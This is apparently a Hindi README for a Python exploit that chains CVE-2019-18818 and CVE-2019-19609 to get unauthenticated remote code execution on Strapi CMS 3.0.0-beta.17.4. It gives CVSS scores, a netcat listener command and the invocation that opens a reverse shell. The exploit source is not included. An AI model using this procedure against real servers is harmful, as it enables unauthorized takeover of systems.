
पायथन शोषण स्क्रिप्ट जो CVE-2019-18818 और CVE-2019-19609 के माध्यम से Strapi CMS 3.0.0-beta.17.4 में बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन को लक्षित करती है, रिवर्स शेल वितरित करती है।
यह शोषण Strapi CMS Framework संस्करण 3.0.0-beta-17.4 में दो कमजोरियों को लक्षित करता है जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) की अनुमति देती हैं।
भूले हुए पासवर्ड के लिए कमजोर पासवर्ड पुनर्प्राप्ति तंत्र
CVSS: 9.8 - गंभीर
अधिक जानकारी: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
OS कमांड में उपयोग किए जाने वाले विशेष तत्वों का अनुचित निष्प्रभावीकरण ('OS Command Injection')
CVSS: 7.2 - उच्च
अधिक जानकारी: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
इस शोषण को चलाने से पहले, नीचे दिए गए विकल्पों में आपके द्वारा निर्दिष्ट lport पर एक netcat लिसनर प्रारंभ करें।
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>